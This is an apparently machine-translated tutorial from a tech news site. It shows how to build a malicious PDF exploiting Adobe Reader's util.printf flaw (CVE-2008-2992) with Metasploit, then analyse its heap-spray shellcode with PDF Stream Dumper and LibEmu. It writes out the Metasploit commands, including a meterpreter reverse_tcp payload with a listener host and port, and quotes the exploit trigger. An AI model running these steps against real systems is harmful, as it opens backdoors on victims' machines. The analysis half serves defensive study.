In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-01-31 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Development >
Share
Shulou(Shulou.com)06/02 Report--
This article will explain in detail how to analyze malicious PDF documents and what the payload extraction method is, the content of the article is of high quality, so the editor shares it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.
Acrobat Reader is a PDF viewer that can read, search, print and interact with almost any type of PDF file. It is no exaggeration to say that almost every computer user has installed and used it. Because of its wide range of users and frequent security problems, it has become one of the most easily used programs by hackers. Through du Niang's search for "Acrobat Reader loophole", it's called a spectacle, and it's always at high risk. It makes my hands itch.
I will show you the complete process of creating malicious PDF documents, triggering and exploiting vulnerabilities. In addition, I will also take you through an in-depth analysis of malicious PDF documents to understand how payload is stored and extracted.
PDF format
PDF (Portable File format, Portable Document Format) is a file format developed by Adobe for file interchange in 1993.
PDF mainly consists of three technologies: derived from PostScript; font embedding system, and data compression and transmission system. Its advantages are cross-platform, can retain the original file format (Layout), open standards, royalty-free (Royalty-free) free development of PDF compatible software, is an open standard. The following is a structure diagram of a typical PDF document. For more information, see the Adobe specification.
Malicious PDF creation
We will use metasploit to create a maliciously forged PDF document that will contain exploit as well as our custom payload. Because this exploit is specific to a specific version, we need to download and install an earlier version of Reader on the target machine.
First, let's create a PDF. After successful utilization, the PDF will pop up a calculator (calc.exe) on the target machine. Open metasploit console and type the following command:
Use exploit/windows/fileformat/adobe_utilprintfset FILENAME malicious.pdfset PAYLOAD windows/execset CMD calc.exeshow optionsexploit
As follows:
Copy the file you just created (/ home/osboxes/.msf4/local/malicious.pdf) to the shared drive.
Execute infected PDF
On the target computer, download and install the vulnerable version of Adobe Reader (metasploit has told us that the version should be less than 8.1.2). I chose to install version 8.1.1.
After installation, we execute the malicious.pdf file. You should see the calculator generated from the Adobe Reader process. The vulnerability was successfully exploited.
I prepared another malicious PDF, using a different payload, as follows:
Set PAYLOAD windows/meterpreter/reverse_tcpset LHOST 192.168.1.29set LPORT 4455
As a result, we successfully built a backdoor (reverse shell) on Adobe Reader.
Analysis of infected PDF
Now, let's take a look at the contents of the malicious PDF and try to extract the payload from it (let's still take calc.exe PDF as an example).
First, we need to use a tool called PDF Stream Dumper to download and install it. Then use the tool to load our malicious PDF documents (please take some time to familiarize yourself with the basic use of the tool).
Let's first use the "Exploit Scan" option in the menu bar to detect if there are some exploitable vulnerabilities:
Exploit CVE-2008-2992 Date:11.4.08 v8.1.2-util.printf-found in stream: 6
In fact, an exploitable vulnerability is hidden in stream 6.
But if we start from scratch: when searching for vulnerabilities in PDF, most of the time we will encounter a heap spray (heap spray) created by Javascript code. This heap spray is used to push payload onto the heap, which can be executed once a vulnerability is triggered.
If you open Stream 1, you can see:
/ Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 5 0 R
Next, we open stream 5:
/ Type/Action/S/JavaScript/JS 6 0 R
Execute the Javascript at stream 6. The stream shows pure Javascript, and now it's time to open the "Javascript_UI" menu. You can see that this is a long string of hexadecimal encoded characters, which we push to a variable to perform the heap spray operation. Here is our payload:
We select payload (the part between quotation marks) and open the "Shellcode_analysis" menu. Select "scDbg-LibEmu Emulation". At this point, a new window pops up and decodes the shellcode into bytes (you can even save it to a file):
LibEmu is a library that simulates the processor. It will tell you the execution information of the assembly code. Click the "Launch" button and you will understand:
Here, we can clearly see that shellcode opens a calc.exe window and exits. Let's do the same analysis with another malicious PDF (reverse shell):
You can see that Shellcode is loading the libraries (ws2_32.dll) needed to manipulate sockets and is trying to connect back to Cobb C.
I'm not talking about exploit itself here, which is at the end of the javascript code. It is executing arbitrary code using a buffer overflow on the printf function. Here is our heap-sprayed shellcode:
Util.printf ("% 45000.45000f", 0); on how to carry out malicious PDF document analysis and payload extraction method is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.